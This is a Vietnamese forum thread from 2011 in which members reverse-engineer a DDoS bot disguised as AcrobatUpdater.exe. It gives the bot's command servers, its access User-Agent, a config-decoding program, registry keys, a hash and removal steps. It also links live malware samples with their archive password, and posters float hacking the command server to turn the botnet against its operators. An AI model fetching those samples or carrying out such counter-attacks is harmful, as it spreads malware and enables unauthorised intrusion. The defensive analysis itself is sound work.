Latest posts for the topic "Phân tích tính chất vài trận DDoS HVA vừa qua."

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Trong tháng 7 năm 2011 này, HVA bị ít nhất là ba trận DDoS khá nặng. Thông qua những thông tin đã thu thập được trong quá trình điều tra và sự hỗ trợ của các bạn bè thành viên, tôi tạm thông báo một số chi tiết quan trọng như sau: - Có tính chất tương tự như con vecebot mà securedWorks đã công bố hồi cuối tháng 10 năm 2010: http://www.secureworks.com/research/threats/vecebot/?threat=vecebot. Con bot dùng để tấn công HVA cũng nhận chỉ thị từ một file cấu hình xml như con vecebot. - Con bot dùng để tấn công HVA cũng sử dụng hàng loạt các User-Agent giả mạo để qua mặt hệ thống cản lọc. Những User-Agent được sử dụng y hệt như những User-Agent đã từng tấn công các trang web và các blogs "lề trái". Theo nguồn tin chưa kiểm chứng, vietnamnet cũng đã từng bị DDoS với cùng tính chất như trên. - Con bot này cũng có thể được khởi động hoặc ngưng lại một cách dễ dàng và nhanh chóng. Điều này biểu hiện qua hiện tượng DDoS đột ngột xảy ra và đột ngột ngưng lại. Trong khi chờ đợi thu thập thêm thông tin để đối chiếu và kiểm chứng. Tôi tạm công bố một số thông tin như trên. Hãy đón xem các thông tin khác sẽ được cập nhật. Xin cám ơn các anh chị em đã nhanh chóng thu thập và cung cấp những thông tin cực kỳ quý giá. PS: HVA chắc chắn sẽ tiếp tục bị DDoS nhằm "bịt miệng" những công bố xuyên qua phân tích và RE.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Thôi thì để em công bố luôn. Các anh STL đọc xong topic này thì close ngay cái host đang ra lệnh DDOS HVA nhé. Coi chừng tụi em chơi trò "Gậy ông đập lưng ông đấy". Bạn cao thủ trẻ tuổi giấu mặt PM cho em sáng nay:

anh ạ, anh chắc còn nhớ vụ GoogleCrashHandle , cái vụ mà em post bên xxxxxx forum, bạn xxxxx đòi giải thích, em tức nên không post nữa... smilie Thực ra cái file ấy, nó còn nhiều chỗ hay lắm. Con ấy nó download về một con khác , chính nó là thủ phạm DDoS Vietnamnet. Nhưng vì đang tức nên em chả viết tiếp. Hồi ấy, cũng rảnh nên em có làm thử 1 cái , mà em bắt chước ở đây https://zeustracker.abuse.ch/ đại khái là tool để track, để theo dõi các mạng botnet, tuy không được hoành tránh như người ta nhưng em cũng sướng lắm smilie) Trong con đó có 1 cái link, là http://penop.net/top.jpg, hồi đó không tải được, nhưng mà mấy hôm nay tự nhiên lại thấy báo có mẫu mới, về giải mã ra ( xor 0x19 theo byte ) thì được 1 link khác để tải cái con VB này về http://penop.net/images01.gif Chính con VB này đang DoS HVA, anh và các anh HVA xem thế nào, dập được server của nó thì tốt quá ! Em gửi anh bộ mẫu, cùng cái file cấu hình, file giải mã cấu hình, anh xem thử xem UserAgent : An0nym0453 http://direct.aliasx.net/xc.jpg <<< Link tải file cấu hình của nó, là định dạng XML http://direct.aliasx.net/xv.jpg <<< File này ghi ngày giờ, để làm gì thì em chịu Link mẫu: http://ifile.it/q13g05h Pass giải nén là: "5D1DCCDA70433CFC795F6D03459B258D"

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp:

Chính là cái file viết bằng VB ấy ạ : AcrobatUpdater.exe. Nó làm nhiệm vụ tân công. Kịch bản thế này ạ: Nó vào cái http://direct.aliasx.net/xc.jpg để tải file cấu hình này về. File này được mã hoá, thuật toán XOR thôi nhưng cũng không đơn giản lắm. Sau đó Bot sử dụng các lớp để parse XML, lấy thông tin, UserAgent, .... rồi tấn công, giống như 1 người dùng bình thường duyệt web và click vào link ấy. Em chỉ hiểu cách nó tấn công là mô phỏng trình duyệt và người dùng lướt web, chứ chống lại thế nào thì em chịu, không có kinh nghiệm. còn http://direct.aliasx.net/xv.jpg là file chứa ngày giờ, chẳng hiểu để làm gì 2 thằng này anh phải dùng UserAgent là An0nym0453 thì mới lấy được nhé. Dùng cái khác là nó trả về mã 403 ngay smilie Cái phức tạp của con này là dùng VB để code, đọc thấy oải. Sau 1 tối ngồi không, em cũng RCE xong. Code giải mã file cấu hình đây, cũng không dài, nhưng chả hiểu hôm qua lơ mơ thế nào em viết thiếu 1 chỗ, nên nếu giải mã vẫn sai đôi chút, giờ thì chắc chắn rồi. Hệ thống tracker trên máy em vẫn định kì download cái file cấu hình và tìm sự thay đổi, nếu có em lại báo anh biết. Hiện giờ nó vẫn tấn công HVA Em có ý này, nếu mà các anh có thể xâm nhập được vào cái direct.aliasx.net. hay mình up file cấu hình của mình lên, với target chính là direct.aliasx.net. Cho các bạn ấy biết thế nào là bị DDoS 1 lần. Gậy ông đập lưng ông mà smilie Code: #include #include int main(int argc, char* argv[]) { FILE *f; int i; char *pBuffer; long lSize; int iKeySize; char szKey[] = "!asDPSk!@sakkf#!@kskdk12#@!#231saad2asdsD"; //key giai ma char szOutPut[MAX_PATH] = ""; if ((argc <2) || (argc >3 )) { printf("Usage: Decode "); exit(1); } if (argc == 2) { strcpy(szOutPut, "Decoded.txt"); } else strncpy(szOutPut, argv[2],MAX_PATH); f = fopen(argv[1], "rb"); //doc file da ma hoa if (f) { fseek(f, 0, SEEK_END); lSize = ftell(f); fseek(f, 0, SEEK_SET); pBuffer = new char[lSize]; if(pBuffer) { fread((char*)pBuffer, lSize, 1, f); iKeySize = lstrlenA(szKey); for (i = 0; i < lSize; ++i) { pBuffer[i] ^= szKey[(i%iKeySize+1)%iKeySize ]; //giai ma file } } fclose(f); if (pBuffer) { f = fopen(szOutPut, "wb"); if (f) { fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma fclose(f); } else printf("Can not open output file."); free(pBuffer); } } else printf("Can not open input file."); return 0; }

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tiếp: File AcrobatReader.exe có file size = 282624 bytes. Viết = VB 6, nhưng lại build trên máy Win7 64bit. Build date: 16/06/2011, 04:18:01. Bất cứ bà con nào đang xem topic này, search ngay trên máy mình file trên, cùng các file AdobeUpdater.exe, wcsntfy.* (tức tất cả các file wcsntfy, đuôi là gì không care), kill process và xoá ngay lập tức. Tool xoá: IceSword, GMER, Unlocker, Rootkit Unhooker.... Thà giết lầm còn hơn bỏ sót anh em. Nếu lỡ trùng file tốt, không sao. Dẹp mấy cái auto update Exe đi, autorun chỉ làm chậm máy, chiếm connection. Và đề nghị anh em post danh sách các file trên lên các blog, forum # để tuyên truyền, khuyên, giúp đỡ mọi người khác, quen hay không quen cũng không sao: Tìm và diệt ngay các file này. Và đây là nội dung file .xml ra lệnh của tụi STL: Code:

Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em ! Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận. useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

File xv.jpg chỉ vỏn vẹn dòng text này: Code:

2011-07-20 16:28:52

Ê, đệ tử, xem trong file xv.jpg nè, tao ra lệnh mày đúng hay quá giờ đó là stop tấn công với các chỉ dẩn từ xc.jpg nghe chưa. Dạ thưa sếp STL, em nghe lệnh. Thằng chủ nhân cái máy này nó không biết đâu, nó là zoombies của "Sống chết theo lệnh" tụi mình mà, he he !!!??? File Exe bot + config của nó em post ở đây: http://www.mediafire.com/?c57bbuc7iwq3ca4 Trong file này còn có file Decode.exe và source Decode.cpp để decode nội dung file xc.jpg ra file .xml để bà con xem. File IDA 61 database chứa thông tin disassembly của con AcrobatUpdater.exe, file images01.gif là chính là file AcrobatUpdater.exe với toàn bộ nội dung đã bị xor với 0x19.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hiện giờ botnet này đang tấn công blog danlambaovn ở các URL sau: http://danlambaovn.blogspot.com/ http://danlambaovn.blogspot.com/2011/07/bat-tay-nhau-thang-7.html http://danlambaovn.blogspot.com/p/vuot-tuong-lua.html http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#more http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#disqus_thread http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#more http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#disqus_thread http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html#more Zombies connect đến: 174.142.132.185 ở cổng 80 và liên lạc với 2 files: xv.jpg và xc.jpg. Người dùng bình thường không thể truy cập trực tiếp vào 2 files này. Chỉ có zombies với giá trị "User-Agent" đặc biệt mới có thể truy cập và nhận mệnh lệnh. Khi con malware này được cấy vào máy, có ít nhất là 3 registry keys được điều chỉnh: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Volatile Environment] CURRENT = "2011-07-20 16:28:52" DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15..... nhằm mục đích thực hiện ngay công tác "tàn phá" khi máy được khởi động. Con malware này còn connect đến 1 địa chỉ của google: 74.125.47.132, không biết để làm gì?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Trên danlambao blog đã có bài trả lời về đợt DDOS này của tụi STL: http://danlambaovn.blogspot.com/2011/07/than-gui-cac-bac-cam.html Bị đánh bắt đầu vào ngày 19 hôm kia. Kinh thật !

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Thử phân tích ở góc độ khác (network capturing) thì thấy:

(để ý cái "User-Agent" đặc biệt). Sau đó thì nhận chỉ thị:

Hoá ra 74.125.47.132 là IP của google đang host cái blog của danlambaovn. Thật ra với lượng traffic ập vào HVA, chỉ cần wwwect đến "mother" thì chỉ cần 30 giây là "mother" chết queo nhưng ai lại đi làm như vậy hở? :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Ngoài việc xoá AcrobatUpdater.exe, bà con nên giúp đỡ lẫn nhau để diệt trừ tận gốc cái vấn nạng DDOS này bằng cách up file AcrobatUpdater.exe lên các AV mà các bạn đang dùng. Càng nhiều AV nhận dạng ra đám bot này thì mấy cái host kia sẽ dần dần vô dụng và tui nó sẽ phải shutdown host thôi. Tới chiều này, 3:06 PM, máy tui với KIS 2011 vừa manual cập nhật, vẫn không detect được AcrobatUpdater.exe là virus, là bot. Bởi vậy bà con không nên thắc mắc là tại sao AV của mình không phát hiện ra. Như tui đã nói ở trên, con bot này khá mới, compile và build vào ngày 16/06/2011, tức vào thời gian các topic về RCE "mèo què" của STL trên HVA ta bắt đầu tiến triển và được chú ý. Lần này tụi STL lại quay sang code = VB, em cũng không hiểu nữa, dùng VC++ với Java chán rồi à. Khi nào dùng Delphi vậy ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Dành cho bạn nào thắc mắc về việc làm sao xoá con malware này. Hãy tìm trong C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau: 1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra. 2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe. 3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm. 4. Xoá nó ngay. 5. Vào registry và xoá các key sau: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe" [HKEY_CURRENT_USER\Volatile Environment] CURRENT = "2011-07-20 16:28:52" DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15

Phân tích tính chất vài trận DDoS HVA vừa qua.

phanledaivuong — GMT

TQN wrote:

Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em ! Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận. useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này.

Em cũng là độc giả của bên danlambaovn. bên đó cũng mới thông báo hôm trước là bị DDoS rất nặng, và em cũng đoán là do tụi chó STL làm. ai dè anh em bên HVA RE ra mấy cái liên quan đến DDoS HVA cũng lòi ra thủ phạm DDoS danlambaovn. danlambaovn có sử dụng blogspot của google. vậy nếu bên STL tiếp tục DDoS với cường độ mạnh thì bên danlambaovn nên thông báo và nhờ google giúp đỡ hay làm như nào để chống? vì đây là sử dụng blog của google nên chắc không được động vào server của google :D hay là băng thông của google rất lớn nên bọn STL DDoS sẽ không "Xi nhê". PS: Việc STL DDoS danlambaovn càng chứng tỏ tụi này được Government thuê ... hoặc là được mấy thằng tầu đào tạo để về đánh người nhà?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Chiều qua up mẫu cho Kaspersky Lab, sáng nay thằng KIS nhà em sau khi lệnh nó update, nó đã nhai mất tiêu mẫu AcrobatUpdater.exe rồi. Phải vào năn nỉ nó để nó nhả ra lại ;) Em cũng mệt mỏi và chán ngán cái đám khùng điên STL này quá rồi. Tui nó như đám chó điên, giờ đang lồng lộn cắn phá lung tung hết ;) Em chỉ sợ từ chiều qua tới giờ, tụi nó cày như trâu để viết con bot mới, đặt ở host mới, hy sinh 2 cái host kia và thằng Adobe/AcrobatUpdater.exe này, lệnh cho ông nội nằm vùng down bot mới về.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

STL sử dụng bot này tấn công theo hành vi duyệt web của người bình thường, thật là không đỡ được. Kĩ thuật sử dụng trong Bot này khá hay, hiện tại em chưa nghĩ ra cách gì để chống lại. Các bác admin có hướng nào để phòng trống không? Nó giả danh 1 người dùng nhé p/s: @phanledaivuong : Government nào thì không biết chứ Government của VN chắc chắn chả bao giờ làm thế. Như bản thân mình thì mình cũng không thích trang danlambaovn và chả bao giờ đọc.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hè hè, từ 5 giờ chiều giờ VN ngày 21/7/2011 đến khoàng trưa nay (khoảng 16 tiếng), HVA bị "ăn đòn khoảng 95 triệu cú đấm. Chơi kiểu huy động gần hết bandwidth và IP của VN để đấm một cái site như HVA thì đúng là "no fair" ;).

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

@TQN: cứ để họ ra bot mới anh ạ. Lại có sample và tiếp tục RCE. STL nếu làm các bot này, nói 1 cách khách quan là khá hiệu quả vì các lý do sau: - Không bị AV phát hiện: Hầu hết như thế, cứ bot nào mới ra là chả AV nào bắt được mặc dù các công nghệ Emulator hay Heuristic theo quảng cáo của các hãng là cũng ghê gớm lắm. Có thể là chém gió chăng ?? - Bot hoạt động hiệu quả: Chỉ cần sửa file cấu hình là bot có thể dừng hoặc tấn công ngay lập tức. Tấn công ồ ạt với số lượng lớn. Mặc dù server đã có các phương án bảo mật khá công phu nhưng họ vẫn đạt mục đích. Nói thế không phải là khen họ giỏi hay tài, nhưng nhìn ở góc độ kĩ thuật thì phải công nhận là hiệu quả.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Tui thì không đứng về bên nào cả, bên nào làm sai thì lên tiếng đã kích. "Trong chính có tà, trong tà có chính", như Đông Phương Bất Bại hồi xưa thôi. Việc STL là của ai, ai nuôi, ai ra lệnh thì tới bây giờ vẫn nằm trong vòng bí mật, có người biết cũng không dám nói. Bổn phận của chúng ta, dân làm IT, kỹ thuật, chỉ nên đơn thuần phân tích, RE, truy lùng dấu vết của tụi nó. Còn việc sau đó nữa thì có người khác lo, hay không lo thì cũng phải chịu. Nếu chỉ vì sợ hãi tui nó hay thế lực đứng sau tụi nó mà chúng ta phải im lặng trước các hành động dơ bẩn, thối nát, không giống ai, không giống nước nào trên thế giới (trừ vài nước) thì chính ta đã vô tình im lặng, tiếp tay cho chúng phá hoại nền IT, cuộc sống, Internet của nước nhà, chính là tiếp tay cho tội ác. Tới bây giờ, chúng ta vẫn làm đúng, vẫn không đụng chạm đến ai cả. Nếu có ai đó hô lên, ê, tụi HVA kia, mày đụng chạm đến tao thì chính hắn đang phơi bày bộ mặt thật, chân tướng thật của hắn, của thế lực đứng sau hắn ra. Chỉ mong các admin HVA chân cứng đá mềm, tiếp tục đấu tranh chống lại đại dịch này. Còn về tại sao các mẫu bot của tụi nó vẫn không bị phát hiện, theo ý em: 1. VN ta là vùng trũng về IT của thế giới. Các tổ chức bảo mật, AVs nghe tới VN ta là ngán, là lơ luôn. Sống chết mặc bay. 2. Có bao nhiêu người dùng có bản quyền của các AVs để upload mẫu mà họ nghi ngờ lên các AVs đấy. Toàn là dùng cờ rắc, dùng key chùa, key lậu. Có bao nhiêu người dùng có khả năng phân tích kỹ thuật để nghi ngờ file đó là STL's "mèo què". 3. Sự "nổ", sự thổi phồng quá đáng, sự im lặng, bao che của nhiều tổ chức An ninh mạng, các AVs trong nước có thẩm quyền. Đôi khi họ muốn diệt, nhưng vì lý do gì đó mà họ không được diệt đám "mèo què" này. 4. Sự vô cảm, sống chết mặc bay. Em bỏ công lên các forum em tham gia, hô hào bà con tự tìm diệt, up mẫu, vậy mà chỉ nhận được các reply vô cảm cực kỳ, đông ke ! Tới bây giờ, em mới thấy buồn và nãn cho cái nghề IT, nền IT của nước nhà. Em bỏ nghề là đúng !

Phân tích tính chất vài trận DDoS HVA vừa qua.

tran_tien — GMT

Chỉ không hiểu lý do mà trong list nạn nhân, lại thấy có cả blogspot.com và wordpress.com ? Attacker ko hiểu đc là khó có thể takedown các địa chỉ này sao ? //. Các bác độc giả độc giếc của cái mớ gì đó, đừng lái topic theo quan điểm chính trị của các bác nhé, topic theo em là thuần kỹ thuật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Để chống lại các STL bot kiểu này, em chỉ chợt nghỉ vài ý kiến này: 1. Các user phải cài firewall chặn và lọc các gói tin đi ra. 2. Cập nhật và dùng các AVs nổi tiếng trên thế giới, đừng dùng các AV "nổ", không chừng dùng các AV "nổ" đó còn nuôi dưỡng thêm cho đám STL's "mèo què" 3. Patch trình duyệt của mình đang dùng để UserAgent là random string. Cái này thì hơi khó với user bình thường. 4. Kiểm soát chặc chẽ các autoruns. Cái nào nghi ngờ thì upload lên VirusTotal, CWSandbox, ThreadExpert ngay. Còn về phía server thì có mấy anh admin lo, em không biết ;)

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

Em có ý kiến thế này, hiện tại e cũng đang làm 1 site 1 ngày có khoảng 100k lượt truy cập. Em muốn giúp đỡ mọi người - những người dính bot bằng cách lất IP của client xem web em và so sánh với đống IP mà HVA đã public. Ông nào nằm trong dải IP đó thì sẽ được suggest chạy 1 phần mềm kiểm tra và diệt hết cái đống virus của STL. Về phần mềm kiểm tra thì em không có khả năng viết rồi, vậy nhờ anh TQN hoặc ai đó viết vậy. Tốt nhất là có thể update được (phòng khi STL ra mẫu mới thì quất luôn). Mong được góp chút sức.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn lequi ! Chỉ cần các AVs update và diệt các con bot của STL thì hiệu quả hơn ct của tui viết hàng trăm lần (lâu rồi không code, lụt nghề rồi), Bạn nên phổ biến tin tức các file bot đấy trên website của bạn để bà con tự tìm diệt = tay hay AV. 2 acoustics89: Giỏi cái cục xxx. Source mấy cái VB class đó có đầy trên mạng. Vd: Google mấy cái cxxx gì đ1o trong AcrobatUpdater.exe là ra ngay. Tụi STL chỉ là tụi đạo code, copy & paster thôi. Còn kỹ thuật mới thì có đám quan thầy ngoại bang của tụi nó đút, mớm cho. Em nói đúng không mấy anh STL, có thấy nhục không ?????

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Em có thể code 1 cái tool để hỗ trợ việc remove mẫu này khỏi máy. Đợi mấy hôm nữa em up. Vì mẫu chạy trên win nên tool cũng chỉ chạy trên win thôi

Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi — GMT

@TQN: Em cũng có dịp đi sửa máy cho vài người bạn, người thân. Đa phần là họ không rành rọt mấy về AV. Nếu mình làm 1 phần mềm chỉ cần họ Run 1 cái, chạy chạy mấy cái progress bar, quét xong hiện cái thông tin đã diệt được em abcd xyz gì đó là họ đã vui lắm lắm rồi. Đợi mấy AVs update thì lúc đó đám STL lại sinh ra mẫu khác thì mình khó chủ động :(. Site em chuyên về giải trí, nên số người biết đến vấn đề này chắc cũng không nhiều. Em có thông báo thì cũng không mấy ngừời biết đường diệt. @acoustics89: Nếu vậy thì tuyệt quá, ông a code sớm sớm tý, em suggest 1 vài chức năng cần thêm như: - Tự động cập nhập - Có thể chạy trên windows 7, không biết virus của tụi này có chạy được trên win 7 không, vì win 7 em đang dùng phân quyền khá tốt, mún thao tác trong ổ C (thư mục program files) và registry đều phải dưới quyền administrator. - Sau khi quét xong nếu máy đang kết nối internet thì sẽ report "Đã quét được xxxx virus, IP: xxx.xxx.xxx.xxx, tên virus này nọ". Có thể chức năng này không cần, nhưng biết đâu sau này nó sẽ có ích. - Thêm nữa là chặn luôn mấy URL, IP nghi ngờ của đám STL. Em xin hết.

Phân tích tính chất vài trận DDoS HVA vừa qua.

totden — GMT

Theo em nghĩ là không nên viết tool, trước e thấy có mấy vụ post tool đã fake lên rồi. Con này mới build, vậy nhờ bot nào để nó phát tán nhanh dữ vậy, có cách nào phát hiện để dẹp nó tận gốc đc ko ah?

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

http://www.threatexpert.com/report.aspx?md5=d517e448e15f3ea3b0405b7679eccfd7 Mình thấy trên Threatexpert rồi, không biết KIS submit hay là TQN or Conmale submit. Btw, với việc đưa lên đây thì các trình AV sẽ update nhanh thôi, tốt hơn nhiều so với việc viết cái tool remove nó. Giá mà BKAV update nhanh thì tốt, vì BKAV rất phổ biến ở các Computers của nhà nước (một số lượng khá lớn). =)) ------------------------------------------------------------------------------ Bạn AVIRA sẽ đưa cái này vào bản update tiếp theo (chắc ngày mai) - Avira ở VN dùng hơi nhiều: AcrobatUpdater.exe MALWARE The file 'AcrobatUpdater.exe' has been determined to be 'MALWARE'.Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Cách upload mẫu ; Avirar : đơn giản về hiệu quả nhanh vào trang http://analysis.avira.com/samples/index.php, điền thông tin cá nhân và upload mẫu, đợi báo cáo. Kaspersky các loại phiên bản và phiên bản cờ Vietnamese http://support.kaspersky.com/virlab/helpdesk.html Đọc và làm theo hướng dẫn. Mcafee https://www.webimmune.net/ Đọc và làm theo hướng dẫn. Dành cho những ai sài các gói phần mềm an ninh của Microsoft kể cả free và commercial https://www.microsoft.com/security/portal/Submission/Submit.aspx http://www.mywot.com/wiki/Malware_submission

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

File config mới của tụi STL này tại host direct.aliasx.net giờ đã xoá hết các host target ở cuối file, chỉ còn lại dòng trêu chọc này: Code:

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

Đã submit thêm lên Microsoft https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1 ------------------------------- Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là wwwect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Em vừa mới quét thử penop.net thì thấy nó down rồi, không lấy top.jpg được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 — GMT

Giống hệt hồi trước mà anh, cứ dùng xong là lại disable cái penop. Bây giờ tiếp tục chờ đợi vậy

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

TQN wrote:

Tui thì không đứng về bên nào cả, bên nào làm sai thì lên tiếng đã kích. "Trong chính có tà, trong tà có chính", như Đông Phương Bất Bại hồi xưa thôi. Việc STL là của ai, ai nuôi, ai ra lệnh thì tới bây giờ vẫn nằm trong vòng bí mật, có người biết cũng không dám nói. Bổn phận của chúng ta, dân làm IT, kỹ thuật, chỉ nên đơn thuần phân tích, RE, truy lùng dấu vết của tụi nó. Còn việc sau đó nữa thì có người khác lo, hay không lo thì cũng phải chịu. Nếu chỉ vì sợ hãi tui nó hay thế lực đứng sau tụi nó mà chúng ta phải im lặng trước các hành động dơ bẩn, thối nát, không giống ai, không giống nước nào trên thế giới (trừ vài nước) thì chính ta đã vô tình im lặng, tiếp tay cho chúng phá hoại nền IT, cuộc sống, Internet của nước nhà, chính là tiếp tay cho tội ác. Tới bây giờ, chúng ta vẫn làm đúng, vẫn không đụng chạm đến ai cả. Nếu có ai đó hô lên, ê, tụi HVA kia, mày đụng chạm đến tao thì chính hắn đang phơi bày bộ mặt thật, chân tướng thật của hắn, của thế lực đứng sau hắn ra. Chỉ mong các admin HVA chân cứng đá mềm, tiếp tục đấu tranh chống lại đại dịch này. Còn về tại sao các mẫu bot của tụi nó vẫn không bị phát hiện, theo ý em: 1. VN ta là vùng trũng về IT của thế giới. Các tổ chức bảo mật, AVs nghe tới VN ta là ngán, là lơ luôn. Sống chết mặc bay. 2. Có bao nhiêu người dùng có bản quyền của các AVs để upload mẫu mà họ nghi ngờ lên các AVs đấy. Toàn là dùng cờ rắc, dùng key chùa, key lậu. Có bao nhiêu người dùng có khả năng phân tích kỹ thuật để nghi ngờ file đó là STL's "mèo què". 3. Sự "nổ", sự thổi phồng quá đáng, sự im lặng, bao che của nhiều tổ chức An ninh mạng, các AVs trong nước có thẩm quyền. Đôi khi họ muốn diệt, nhưng vì lý do gì đó mà họ không được diệt đám "mèo què" này. 4. Sự vô cảm, sống chết mặc bay. Em bỏ công lên các forum em tham gia, hô hào bà con tự tìm diệt, up mẫu, vậy mà chỉ nhận được các reply vô cảm cực kỳ, đông ke ! Tới bây giờ, em mới thấy buồn và nãn cho cái nghề IT, nền IT của nước nhà. Em bỏ nghề là đúng !

Đừng nản em. Ở thời điểm này, có rất nhiều người đồng cảm với việc làm của mình và cũng có rất nhiều người phỉ nhổ những trò tồi bại nhưng họ không công khai biểu lộ. Nếu mình không làm thì có lẽ chẳng có ai làm hết. Những biện pháp mình làm ở đây đa phần nằm trong diện "reactive" chớ không phải "proactive" bởi vì mình chẳng có một cơ quan hoặc tổ chức nào để nhờ cậy hết. Tuy vậy, nó cũng góp phần làm sạch một phần nào đó tính nhớp nhúa. Biện pháp duy nhất là cảnh sát Canada, FBI Mỹ và nhà nước VN phối hợp thộp cổ đám phá hoại trong bóng tối này và cho mỗi ông một chục xấp lịch để đếm là yên chuyện.

Phân tích tính chất vài trận DDoS HVA vừa qua.

texudo — GMT

Đây là một việc cực kỳ nghiêm trọng, một mạng botnet khổng lồ được thiết lập ở Việt nam. Vậy mà chẳng cơ quan có thẩm quyền, báo chí nào lên tiếng cho bà con biết nhỉ. Thiệt là lạ quá, có chăng TQN & HVA team đang một mình chống lại thế lực với ảnh hưởng lớn, khống chế cả giới truyền thông chăng. Các ISP của Việt nam nữa, mình nghĩ là họ biết các thuê bao của họ đã bị nhiễm một loại malware dùng để tấn công DDOS, nhưng có vẻ họ không muốn lên tiếng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

fuga — GMT

